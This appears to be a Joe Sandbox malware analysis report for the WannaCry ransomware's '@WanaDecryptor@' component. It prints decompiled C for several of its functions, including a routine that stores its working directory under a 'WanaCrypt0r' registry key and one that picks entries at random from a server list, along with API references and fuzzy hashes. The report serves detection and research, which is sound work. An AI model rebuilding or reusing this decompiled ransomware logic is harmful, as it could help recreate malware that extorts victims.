                                  • Opcode Fuzzy Hash: f4b882eb859de0a193a05a3978ec51d1331cae20c00cf70a3d190a6334ff0923
                                  • Instruction Fuzzy Hash: 32218E711806017FE22AE365CD82FFFA26CEF85B04F00452EB369951C1BBE8365B5665
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 371 406dc0-406dfa SendMessageA #823 372 406e00-406e08 371->372 373 406edf-406ee6 371->373 374 406e0a-406e0c 372->374 375 406e0e 372->375 376 406e11-406e29 SendMessageA 374->376 375->376 377 406ed2-406edc #825 376->377 378 406e2f-406e49 _strnicmp 376->378 377->373 379 406e67-406e6c 378->379 380 406e4b-406e65 _strnicmp 378->380 381 406ec9-406ecc 379->381 382 406e6e 379->382 380->379 380->381 381->377 381->378 383 406e72-406e76 382->383 384 406e78-406e7b 383->384 385 406e7f-406e85 383->385 384->383 386 406e7d 384->386 385->381 387 406e87-406ec4 SendMessageA #6136 385->387 386->381 387->381
                                  C-Code - Quality: 64%
                                  			E00406DC0(void* __ecx) {
                                  				int _v76;
                                  				int _v80;
                                  				char _v84;
                                  				int _v88;
                                  				long _v92;
                                  				void* _v96;
                                  				int _v100;
                                  				void* _v104;
                                  				long _t28;
                                  				void* _t29;
                                  				struct HWND__* _t30;
                                  				int _t32;
                                  				void* _t35;
                                  				int _t39;
                                  				long _t47;
                                  				int _t48;
                                  				void* _t51;
                                  
                                  				_t35 = __ecx;
                                  				_t48 = 0;
                                  				_t28 = SendMessageA( *(__ecx + 0x4e0), 0xe, 0, 0);
                                  				_t47 = _t28;
                                  				_v96 = 0;
                                  				_v92 = _t47;
                                  				_t4 = _t47 + 1; // 0x1
                                  				L00412CEC();
                                  				_t51 =  &_v104 + 4;
                                  				_v88 = _t28;
                                  				if(_t28 == 0) {
                                  					return _t28;
                                  				}
                                  				_t29 = _t35 + 0x4c0;
                                  				if(_t29 != 0) {
                                  					_t30 =  *(_t29 + 0x20);
                                  				} else {
                                  					_t30 = 0;
                                  				}
                                  				SendMessageA(_t30, 0x44b, _t48,  &_v96); // executed
                                  				_t32 = _v88;
                                  				 *((char*)(_t32 + _t47)) = 0;
                                  				if(_t47 < 0) {
                                  					L15:
                                  					_push(_v88);
                                  					L00412C98();
                                  					return _t32;
                                  				} else {
                                  					do {
                                  						__imp___strnicmp(_t48 + _v88, "<http://", 8);
                                  						_t51 = _t51 + 0xc;
                                  						if(_t32 == 0) {
                                  							L7:
                                  							_t48 = _t48 + 1;
                                  							_t39 = _t48;
                                  							if(_t48 > _t47) {
                                  								goto L14;
                                  							}
                                  							_t32 = _v88;
                                  							while( *((char*)(_t48 + _t32)) != 0x3e) {
                                  								_t48 = _t48 + 1;
                                  								if(_t48 <= _t47) {
                                  									continue;
                                  								}
                                  								goto L14;
                                  							}
                                  							_t32 = _t48;
                                  							_t48 = _t48 + 1;
                                  							if(_t32 != 0xffffffff) {
                                  								_v100 = _t32;
                                  								_v104 = _t39;
                                  								SendMessageA( *(_t35 + 0x4e0), 0x437, 0,  &_v104);
                                  								_t32 = 0x20;
                                  								_push( &_v84);
                                  								_v84 = 0x54;
                                  								_v76 = 0x20;
                                  								_v80 = 0x20;
                                  								L00412F4A();
                                  							}
                                  							goto L14;
                                  						}
                                  						_t32 = _v88;
                                  						__imp___strnicmp(_t48 + _t32, "<https://", 9);
                                  						_t51 = _t51 + 0xc;
                                  						if(_t32 != 0) {
                                  							goto L14;
                                  						}
                                  						goto L7;
                                  						L14:
                                  						_t48 = _t48 + 1;
                                  					} while (_t48 <= _t47);
                                  					goto L15;
                                  				}
                                  			}





















                                  APIs
                                  • SendMessageA.USER32(?,0000000E,00000000,00000000), ref: 00406DDC
                                  • #823.MFC42(00000001,?,?), ref: 00406DEC
                                  • SendMessageA.USER32(?,0000044B,00000000,?), ref: 00406E1D
                                  • _strnicmp.MSVCRT ref: 00406E3E
                                  • _strnicmp.MSVCRT ref: 00406E5A
                                  • SendMessageA.USER32(?,00000437,00000000,?), ref: 00406EA2
                                  • #6136.MFC42 ref: 00406EC4
                                  • #825.MFC42(?), ref: 00406ED7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessageSend$_strnicmp$#6136#823#825
                                  • String ID: <http://$<https://$T
                                  • API String ID: 1228111698-1216084165
                                  • Opcode ID: cdce9b46107efdddb91857a97f1fff2144e6341c78577d605c9c0136cf899573
                                  • Instruction ID: 32e461136b03d60599108953de6477053a568cccd29e118696d71e5d9ed076ef
                                  • Opcode Fuzzy Hash: cdce9b46107efdddb91857a97f1fff2144e6341c78577d605c9c0136cf899573
                                  • Instruction Fuzzy Hash: 7E31D6B52043509BD320CF18CC41FABB7E4BB98704F044A3EF98AD7281E678D95987D9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 388 413102-413177 __set_app_type __p__fmode __p__commode call 4133c7 391 413185-4131dc call 4133b2 _initterm __getmainargs _initterm 388->391 392 413179-413184 __setusermatherr 388->392 395 413218-41321b 391->395 396 4131de-4131e6 391->396 392->391 397 4131f5-4131f9 395->397 398 41321d-413221 395->398 399 4131e8-4131ea 396->399 400 4131ec-4131ef 396->400 402 4131fb-4131fd 397->402 403 4131ff-413210 GetStartupInfoA 397->403 398->395 399->396 399->400 400->397 401 4131f1-4131f2 400->401 401->397 402->401 402->403 404 413223-413225 403->404 405 413212-413216 403->405 406 413226-413231 GetModuleHandleA call 4133e6 404->406 405->406 408 413236-413253 exit _XcptFilter 406->408
                                  C-Code - Quality: 80%
                                  			_entry_(void* __ebx, void* __edi, void* __esi) {
                                  				CHAR* _v8;
                                  				intOrPtr* _v24;
                                  				intOrPtr _v28;
                                  				struct _STARTUPINFOA _v96;
                                  				int _v100;
                                  				char** _v104;
                                  				int _v108;
                                  				void _v112;
                                  				char** _v116;
                                  				intOrPtr* _v120;
                                  				intOrPtr _v124;
                                  				intOrPtr* _t23;
                                  				intOrPtr* _t24;
                                  				void* _t27;
                                  				void _t29;
                                  				intOrPtr _t36;
                                  				signed int _t38;
                                  				int _t40;
                                  				intOrPtr* _t41;
                                  				intOrPtr _t42;
                                  				intOrPtr _t46;
                                  				intOrPtr _t47;
                                  				intOrPtr _t49;
                                  				intOrPtr* _t55;
                                  				intOrPtr _t58;
                                  				intOrPtr _t61;
                                  
                                  				_push(0xffffffff);
                                  				_push(0x41baa8);
                                  				_push(0x413050);
                                  				_push( *[fs:0x0]);
                                  				 *[fs:0x0] = _t58;
                                  				_v28 = _t58 - 0x68;
                                  				_v8 = 0;
                                  				__set_app_type(2);
                                  				 *0x422298 =  *0x422298 | 0xffffffff;
                                  				 *0x42229c =  *0x42229c | 0xffffffff;
                                  				_t23 = __p__fmode();
                                  				_t46 =  *0x42228c; // 0x0
                                  				 *_t23 = _t46;
                                  				_t24 = __p__commode();
                                  				_t47 =  *0x422288; // 0x0
                                  				 *_t24 = _t47;
                                  				 *0x422294 = _adjust_fdiv;
                                  				_t27 = E004133C7( *_adjust_fdiv);
                                  				_t61 =  *0x421790; // 0x1
                                  				if(_t61 == 0) {
                                  					__setusermatherr(E004133C4);
                                  				}
                                  				E004133B2(_t27);
                                  				_push(0x41f018);
                                  				_push(0x41f014);
                                  				L004133AC();
                                  				_t29 =  *0x422284; // 0x0
                                  				_v112 = _t29;
                                  				__getmainargs( &_v100,  &_v116,  &_v104,  *0x422280,  &_v112);
                                  				_push(0x41f010);
                                  				_push(0x41f000);
                                  				L004133AC();
                                  				_t55 =  *_acmdln;
                                  				_v120 = _t55;
                                  				if( *_t55 != 0x22) {
                                  					while( *_t55 > 0x20) {
                                  						_t55 = _t55 + 1;
                                  						_v120 = _t55;
                                  					}
                                  				} else {
                                  					do {
                                  						_t55 = _t55 + 1;
                                  						_v120 = _t55;
                                  						_t42 =  *_t55;
                                  					} while (_t42 != 0 && _t42 != 0x22);
                                  					if( *_t55 == 0x22) {
                                  						L6:
                                  						_t55 = _t55 + 1;
                                  						_v120 = _t55;
                                  					}
                                  				}
                                  				_t36 =  *_t55;
                                  				if(_t36 != 0 && _t36 <= 0x20) {
                                  					goto L6;
                                  				}
                                  				_v96.dwFlags = 0;
                                  				GetStartupInfoA( &_v96); // executed
                                  				if((_v96.dwFlags & 0x00000001) == 0) {
                                  					_t38 = 0xa;
                                  				} else {
                                  					_t38 = _v96.wShowWindow & 0x0000ffff;
                                  				}
                                  				_t40 = E004133E6(GetModuleHandleA(0), _t39, 0, _t55, _t38);
                                  				_v108 = _t40;
                                  				exit(_t40);
                                  				_t41 = _v24;
                                  				_t49 =  *((intOrPtr*)( *_t41));
                                  				_v124 = _t49;
                                  				_push(_t41);
                                  				_push(_t49);
                                  				L004133A6();
                                  				return _t41;
                                  			}

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                  • String ID:
                                  • API String ID: 801014965-0
                                  • Opcode ID: 9f29f74fa0ca4091ce937db24ce742eca73e17089ce00c114469281514e7078a
                                  • Instruction ID: fcecf6e401754473f6225594f41014142e7d5ca2867d00c097f2044c16acc313
                                  • Opcode Fuzzy Hash: 9f29f74fa0ca4091ce937db24ce742eca73e17089ce00c114469281514e7078a
                                  • Instruction Fuzzy Hash: F9419F71940308EFCB20DFA4DC45AE97BB9EB09711B20016FF855972A1D7788A81CB6C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 84%
                                  			E00401C70(signed int _a4) {
                                  				void _v519;
                                  				char _v520;
                                  				void _v700;
                                  				short _v720;
                                  				int _v724;
                                  				void* _v728;
                                  				int _t30;
                                  				void* _t36;
                                  				signed int _t38;
                                  				signed int _t46;
                                  				signed int _t56;
                                  				int _t72;
                                  				void* _t77;
                                  
                                  				_t30 = memset( &_v700, memcpy( &_v720, L"Software\\", 5 << 2), 0x2d << 2);
                                  				_v520 = _t30;
                                  				memset( &_v519, _t30, 0x81 << 2);
                                  				asm("stosw");
                                  				asm("stosb");
                                  				_v728 = 0;
                                  				wcscat( &_v720, L"WanaCrypt0r");
                                  				_t72 = 0;
                                  				_v724 = 0;
                                  				do {
                                  					if(_t72 != 0) {
                                  						RegCreateKeyW(0x80000001,  &_v720,  &_v728);
                                  					} else {
                                  						RegCreateKeyW(0x80000002,  &_v720,  &_v728);
                                  					}
                                  					_t36 = _v728;
                                  					if(_t36 == 0) {
                                  						goto L10;
                                  					} else {
                                  						_t56 = _a4;
                                  						if(_t56 == 0) {
                                  							_v724 = 0x207;
                                  							_t38 = RegQueryValueExA(_t36, "wd", 0, 0,  &_v520,  &_v724); // executed
                                  							asm("sbb esi, esi");
                                  							_t77 =  ~_t38 + 1;
                                  							if(_t77 != 0) {
                                  								SetCurrentDirectoryA( &_v520);
                                  							}
                                  						} else {
                                  							GetCurrentDirectoryA(0x207,  &_v520);
                                  							asm("repne scasb");
                                  							_t46 = RegSetValueExA(_v728, "wd", 0, 1,  &_v520,  !(_t56 | 0xffffffff));
                                  							_t72 = _v724;
                                  							asm("sbb esi, esi");
                                  							_t77 =  ~_t46 + 1;
                                  						}
                                  						RegCloseKey(_v728); // executed
                                  						if(_t77 != 0) {
                                  							return 1;
                                  						} else {
                                  							goto L10;
                                  						}
                                  					}
                                  					L13:
                                  					L10:
                                  					_t72 = _t72 + 1;
                                  					_v724 = _t72;
                                  				} while (_t72 < 2);
                                  				return 0;
                                  				goto L13;
                                  			}

                                  APIs
                                  • wcscat.MSVCRT ref: 00401CC1
                                  • RegCreateKeyW.ADVAPI32(80000001,?,?), ref: 00401D00
                                  • GetCurrentDirectoryA.KERNEL32(00000207,?), ref: 00401D2A
                                  • RegSetValueExA.ADVAPI32(?,0041FDC4,00000000,00000001,?), ref: 00401D53
                                  • RegQueryValueExA.KERNELBASE ref: 00401D81
                                  • SetCurrentDirectoryA.KERNEL32(?), ref: 00401D98
                                  • RegCloseKey.KERNELBASE(00000000), ref: 00401DA3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CurrentDirectoryValue$CloseCreateQuerywcscat
                                  • String ID: Software\$WanaCrypt0r
                                  • API String ID: 3883271862-1723423467
                                  • Opcode ID: 105d7a24118395946ed673951bb32e2166cb0bb2b49e0db688a6da733a97e5a2
                                  • Instruction ID: c02b3dbe7123360802e3a7ceba079e11f57c538643229ddb10ed726050e42e59
                                  • Opcode Fuzzy Hash: 105d7a24118395946ed673951bb32e2166cb0bb2b49e0db688a6da733a97e5a2
                                  • Instruction Fuzzy Hash: 5F31C271208341ABD320CF54DC44BEBB7A8FFC4750F404D2EF996A7290D7B4A90987A6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 86%
                                  			E0040BAF0() {
                                  				signed int _t71;
                                  				signed int _t72;
                                  				void* _t84;
                                  				signed int _t86;
                                  				signed int _t91;
                                  				signed int _t92;
                                  				signed int _t97;
                                  				intOrPtr _t101;
                                  				signed int _t110;
                                  				void* _t113;
                                  				void* _t116;
                                  				signed int _t126;
                                  				char _t129;
                                  				signed int _t131;
                                  				unsigned int _t138;
                                  				signed int _t139;
                                  				char* _t144;
                                  				signed int _t147;
                                  				unsigned int _t152;
                                  				signed int _t153;
                                  				signed int _t158;
                                  				signed int _t160;
                                  				signed int _t161;
                                  				signed int _t169;
                                  				signed int _t172;
                                  				signed int _t173;
                                  				signed int _t181;
                                  				signed int _t191;
                                  				signed int _t198;
                                  				signed int _t199;
                                  				signed int _t200;
                                  				void* _t237;
                                  				char* _t238;
                                  				void* _t240;
                                  				void* _t241;
                                  				intOrPtr* _t242;
                                  				void* _t245;
                                  				intOrPtr* _t246;
                                  				signed int _t249;
                                  				intOrPtr* _t250;
                                  				intOrPtr _t251;
                                  				void* _t252;
                                  				void* _t255;
                                  				void* _t256;
                                  				void* _t257;
                                  				void* _t259;
                                  				void* _t260;
                                  				void* _t262;
                                  				void* _t263;
                                  				void* _t264;
                                  
                                  				_push(0xffffffff);
                                  				_push(E00414286);
                                  				_push( *[fs:0x0]);
                                  				 *[fs:0x0] = _t251;
                                  				_t252 = _t251 - 0x47c;
                                  				_t71 = E0040BA10();
                                  				if(_t71 != 0) {
                                  					L31:
                                  					_t72 = _t71 | 0xffffffff;
                                  					__eflags = _t72;
                                  				} else {
                                  					_t131 =  *0x422210; // 0xb7d178
                                  					 *((intOrPtr*)( *_t131 + 0xc))();
                                  					asm("repne scasb");
                                  					_t266 =  !(_t131 | 0xffffffff) == 1;
                                  					if( !(_t131 | 0xffffffff) == 1) {
                                  						L3:
                                  						_t249 = 0;
                                  						 *((char*)(_t252 + 0x14)) =  *((intOrPtr*)(_t252 + 0x13));
                                  						 *((intOrPtr*)(_t252 + 0x18)) = E0040C8F0(0, 0, 0);
                                  						 *(_t252 + 0x1c) = 0;
                                  						asm("repne scasb");
                                  						_t138 =  !(_t252 + 0x0000001c | 0xffffffff);
                                  						_t237 =  *((intOrPtr*)(_t252 + 0x49c)) - _t138;
                                  						 *((intOrPtr*)(_t252 + 0x498)) = 0;
                                  						_t139 = _t138 >> 2;
                                  						memcpy(_t237 + _t139 + _t139, _t237, memcpy(_t252 + 0xa4, _t237, _t139 << 2) & 0x00000003);
                                  						_t255 = _t252 + 0x18;
                                  						_t144 = _t255 + 0xa8;
                                  						_t238 = strtok(_t144, ",;");
                                  						_t256 = _t255 + 8;
                                  						if(_t238 != 0) {
                                  							_t129 =  *((intOrPtr*)(_t256 + 0x13));
                                  							do {
                                  								_t200 = _t249;
                                  								_t249 = _t249 + 1;
                                  								if(_t200 > 0) {
                                  									_t181 = _t256 + 0x28;
                                  									 *(_t256 + 0x28) = _t129;
                                  									E0040C7B0(_t181, 0);
                                  									asm("repne scasb");
                                  									_push( !(_t181 | 0xffffffff) - 1);
                                  									_push(_t238);
                                  									E0040C920(_t256 + 0x2c);
                                  									 *((char*)(_t256 + 0x4a0)) = 1;
                                  									E0040C800(_t256 + 0x24, _t256 + 0x20, _t256 + 0x24,  *((intOrPtr*)(_t256 + 0x18)), _t256 + 0x24);
                                  									_t144 = _t256 + 0x28;
                                  									 *((char*)(_t256 + 0x498)) = 0;
                                  									E0040C7B0(_t144, 1);
                                  								}
                                  								_t238 = strtok(0, ",;");
                                  								_t256 = _t256 + 8;
                                  							} while (_t238 != 0);
                                  						}
                                  						asm("repne scasb");
                                  						_t147 =  !(_t144 | 0xffffffff) - 1;
                                  						if(_t147 == 0) {
                                  							L17:
                                  							_push(_t256 + 0xa4);
                                  							_t84 = E0040BA60(_t277);
                                  							_t256 = _t256 + 4;
                                  							if(_t84 != 0) {
                                  								goto L19;
                                  							} else {
                                  								asm("repne scasb");
                                  								_t172 =  !(_t147 | 0xffffffff);
                                  								_t245 = _t256 + 0xa4 - _t172;
                                  								_t173 = _t172 >> 2;
                                  								memcpy(0x422214, _t245, _t173 << 2);
                                  								_t263 = _t256 + 0xc;
                                  								 *((intOrPtr*)(_t263 + 0x498)) = 0xffffffff;
                                  								_t113 = memcpy(_t245 + _t173 + _t173, _t245, _t172 & 0x00000003);
                                  								_t264 = _t263 + 0xc;
                                  								E0040C860(_t264 + 0x20, _t264 + 0x24,  *_t113,  *((intOrPtr*)(_t256 + 0x18)));
                                  								_push( *((intOrPtr*)(_t264 + 0x18)));
                                  								L00412C98();
                                  								_t252 = _t264 + 4;
                                  								_t72 = 0;
                                  							}
                                  						} else {
                                  							_t246 = _t256 + 0xa4;
                                  							_t116 = 0x422214;
                                  							while(1) {
                                  								_t198 =  *_t116;
                                  								_t147 = _t198;
                                  								if(_t198 !=  *_t246) {
                                  									break;
                                  								}
                                  								if(_t147 == 0) {
                                  									L14:
                                  									_t116 = 0;
                                  								} else {
                                  									_t24 = _t116 + 1; // 0x0
                                  									_t199 =  *_t24;
                                  									_t147 = _t199;
                                  									if(_t199 !=  *((intOrPtr*)(_t246 + 1))) {
                                  										break;
                                  									} else {
                                  										_t116 = _t116 + 2;
                                  										_t246 = _t246 + 2;
                                  										if(_t147 != 0) {
                                  											continue;
                                  										} else {
                                  											goto L14;
                                  										}
                                  									}
                                  								}
                                  								L16:
                                  								_t277 = _t116;
                                  								if(_t116 == 0) {
                                  									L19:
                                  									srand(GetTickCount());
                                  									_t86 =  *(_t256 + 0x20);
                                  									_t257 = _t256 + 4;
                                  									__eflags = _t86;
                                  									if(_t86 <= 0) {
                                  										L30:
                                  										 *((intOrPtr*)(_t257 + 0x494)) = 0xffffffff;
                                  										_t71 = E0040C860(_t257 + 0x20, _t257 + 0x3c,  *((intOrPtr*)( *((intOrPtr*)(_t257 + 0x18)))),  *((intOrPtr*)(_t257 + 0x18)));
                                  										_push( *((intOrPtr*)(_t257 + 0x18)));
                                  										L00412C98();
                                  										_t252 = _t257 + 4;
                                  										goto L31;
                                  									} else {
                                  										do {
                                  											_t191 = rand() % _t86;
                                  											_t250 =  *((intOrPtr*)( *((intOrPtr*)(_t257 + 0x18))));
                                  											__eflags = _t191;
                                  											_t91 = _t191;
                                  											if(_t191 > 0) {
                                  												_t91 = 0;
                                  												__eflags = 0;
                                  												do {
                                  													_t250 =  *_t250;
                                  													_t191 = _t191 - 1;
                                  													__eflags = _t191;
                                  												} while (_t191 != 0);
                                  											}
                                  											__eflags = _t91;
                                  											if(_t91 < 0) {
                                  												_t110 =  ~_t91;
                                  												do {
                                  													_t250 =  *((intOrPtr*)(_t250 + 4));
                                  													_t110 = _t110 - 1;
                                  													__eflags = _t110;
                                  												} while (_t110 != 0);
                                  											}
                                  											_t92 =  *(_t250 + 0xc);
                                  											_t42 = _t250 + 8; // 0x8
                                  											_t126 = _t42;
                                  											__eflags = _t92;
                                  											if(__eflags == 0) {
                                  												_t92 = 0x41ba38;
                                  											}
                                  											asm("repne scasb");
                                  											_t152 =  !(_t147 | 0xffffffff);
                                  											_t240 = _t92 - _t152;
                                  											_t153 = _t152 >> 2;
                                  											memcpy(_t240 + _t153 + _t153, _t240, memcpy(_t257 + 0x40, _t240, _t153 << 2) & 0x00000003);
                                  											_t259 = _t257 + 0x18;
                                  											_t158 = _t259 + 0x40;
                                  											_push(_t158);
                                  											_t97 = E0040BA60(__eflags);
                                  											_t260 = _t259 + 4;
                                  											__eflags = _t97;
                                  											if(_t97 == 0) {
                                  												 *((intOrPtr*)(_t260 + 0x494)) = 0xffffffff;
                                  												asm("repne scasb");
                                  												_t160 =  !(_t158 | 0xffffffff);
                                  												_t241 = _t260 + 0x40 - _t160;
                                  												_t161 = _t160 >> 2;
                                  												memcpy(0x422214, _t241, _t161 << 2);
                                  												memcpy(_t241 + _t161 + _t161, _t241, _t160 & 0x00000003);
                                  												_t262 = _t260 + 0x18;
                                  												_t242 =  *((intOrPtr*)(_t262 + 0x18));
                                  												_t101 =  *_t242;
                                  												__eflags = _t101 - _t242;
                                  												 *((intOrPtr*)(_t262 + 0x20)) = _t101;
                                  												if(_t101 != _t242) {
                                  													do {
                                  														_push(0);
                                  														E0040C740(_t262 + 0x1c, _t262 + 0x3c,  *((intOrPtr*)(E00402D90(_t262 + 0x28, _t262 + 0x38))));
                                  														__eflags =  *((intOrPtr*)(_t262 + 0x20)) - _t242;
                                  													} while ( *((intOrPtr*)(_t262 + 0x20)) != _t242);
                                  												}
                                  												_push( *((intOrPtr*)(_t262 + 0x18)));
                                  												L00412C98();
                                  												_t252 = _t262 + 4;
                                  												_t72 = 0;
                                  											} else {
                                  												goto L29;
                                  											}
                                  											goto L32;
                                  											L29:
                                  											_t169 =  *0x422210; // 0xb7d178
                                  											 *((intOrPtr*)( *_t169 + 0xc))();
                                  											 *((intOrPtr*)( *((intOrPtr*)(_t250 + 4)))) =  *_t250;
                                  											_t147 = _t126;
                                  											 *((intOrPtr*)( *_t250 + 4)) =  *((intOrPtr*)(_t250 + 4));
                                  											E0040CE50(_t147, 0);
                                  											_push(_t250);
                                  											L00412C98();
                                  											_t257 = _t260 + 4;
                                  											 *((intOrPtr*)(_t257 + 0x20)) =  *((intOrPtr*)(_t260 + 0x20)) - 1;
                                  											Sleep(0xbb8); // executed
                                  											_t86 =  *(_t257 + 0x1c);
                                  											__eflags = _t86;
                                  										} while (_t86 > 0);
                                  										goto L30;
                                  									}
                                  								} else {
                                  									goto L17;
                                  								}
                                  								goto L32;
                                  							}
                                  							asm("sbb eax, eax");
                                  							asm("sbb eax, 0xffffffff");
                                  							goto L16;
                                  						}
                                  					} else {
                                  						_push(0x422214);
                                  						_t72 = E0040BA60(_t266);
                                  						_t252 = _t252 + 4;
                                  						if(_t72 != 0) {
                                  							goto L3;
                                  						}
                                  					}
                                  				}
                                  				L32:
                                  				 *[fs:0x0] =  *((intOrPtr*)(_t252 + 0x48c));
                                  				return _t72;
                                  			}






















































                                  APIs
                                  • strtok.MSVCRT ref: 0040BBA9
                                  • strtok.MSVCRT ref: 0040BC22
                                  • #825.MFC42(?,?), ref: 0040BCDD
                                  • GetTickCount.KERNEL32 ref: 0040BCEC
                                  • srand.MSVCRT ref: 0040BCF3
                                  • rand.MSVCRT ref: 0040BD09
                                  • #825.MFC42(00000000,00000000,?,?,?,00000000,00000000), ref: 0040BD9F
                                  • Sleep.KERNELBASE(00000BB8,00000000,?,?,?,00000000,00000000), ref: 0040BDB5
                                  • #825.MFC42(?,?,?,?), ref: 0040BDED
                                    • Part of subcall function 0040C860: #825.MFC42(?,00000000,0019FA30,00422214,00000000,0040BDE8,?,?,?), ref: 0040C8B5
                                  • #825.MFC42(?), ref: 0040BE7A
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #825$strtok$CountSleepTickrandsrand
                                  • String ID:
                                  • API String ID: 1749417438-0
                                  • Opcode ID: 96e699f875d8ec980aa85d24ffdf4feb71e75c823abe6f95846dbf914e7e69aa
                                  • Instruction ID: 15ce6157e9eadcb8372a8ba3d428bceb52ebc69e02ab62c17c692bc1e2f98a80
                                  • Opcode Fuzzy Hash: 96e699f875d8ec980aa85d24ffdf4feb71e75c823abe6f95846dbf914e7e69aa
                                  • Instruction Fuzzy Hash: 48A102716082059BC724DF34C841AABB7D4EF95314F044A3EF99AA73D1EB78D908C79A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 83%
                                  			E004085C0(intOrPtr __ecx) {
                                  				char _v4;
                                  				intOrPtr _v16;
                                  				long _v20;
                                  				void _v24;
                                  				intOrPtr _v28;
                                  				int _t33;
                                  				intOrPtr _t50;
                                  				long _t53;
                                  				intOrPtr _t55;
                                  
                                  				_push(0xffffffff);
                                  				_push(E00413FF3);
                                  				_push( *[fs:0x0]);
                                  				 *[fs:0x0] = _t55;
                                  				_t50 = __ecx;
                                  				_v16 = __ecx;
                                  				L00412C8C();
                                  				 *((intOrPtr*)(__ecx)) = 0x4157f0;
                                  				_v4 = 0;
                                  				L00412F74();
                                  				 *((intOrPtr*)(__ecx + 0x74)) = 0;
                                  				 *((intOrPtr*)(__ecx + 0x78)) = 0;
                                  				 *((intOrPtr*)(__ecx + 0x7c)) = 0;
                                  				 *((intOrPtr*)(__ecx + 0x80)) = 0;
                                  				_v4 = 1;
                                  				 *((intOrPtr*)(__ecx)) = 0x4161a4;
                                  				 *((intOrPtr*)(_t50 + 0x58)) = GetSysColor(0xf);
                                  				 *((intOrPtr*)(_t50 + 0x60)) = GetSysColor(9);
                                  				 *((intOrPtr*)(_t50 + 0x64)) = GetSysColor(0x12);
                                  				_t53 = GetSysColor(2);
                                  				_v20 = _t53;
                                  				_v24 = 0;
                                  				_t33 = SystemParametersInfoA(0x1008, 0,  &_v24, 0); // executed
                                  				if(_t33 != 0 && _v24 != 0) {
                                  					_t53 = GetSysColor(0x1b);
                                  				}
                                  				_push(0xffffffff);
                                  				_push(2);
                                  				L00412F50();
                                  				 *((intOrPtr*)( *((intOrPtr*)(_t50 + 0x44)))) = _v28;
                                  				 *((intOrPtr*)( *((intOrPtr*)(_t50 + 0x44)) + 4)) = _t53;
                                  				 *((intOrPtr*)(_t50 + 0x70)) = 0xa;
                                  				 *((intOrPtr*)(_t50 + 0x68)) = 0;
                                  				 *((intOrPtr*)(_t50 + 0x6c)) = 0x28;
                                  				 *((intOrPtr*)(_t50 + 0x54)) = 0;
                                  				 *((intOrPtr*)(_t50 + 0x5c)) = 0;
                                  				 *[fs:0x0] = _v20;
                                  				return _t50;
                                  			}













                                  APIs
                                  • #567.MFC42(00000000,?,?,?,000000FF,00405AAB,00000000), ref: 004085E2
                                  • #341.MFC42(00000000,?,?,?,000000FF,00405AAB,00000000), ref: 004085F6
                                  • GetSysColor.USER32 ref: 0040861D
                                  • GetSysColor.USER32(00000009), ref: 00408624
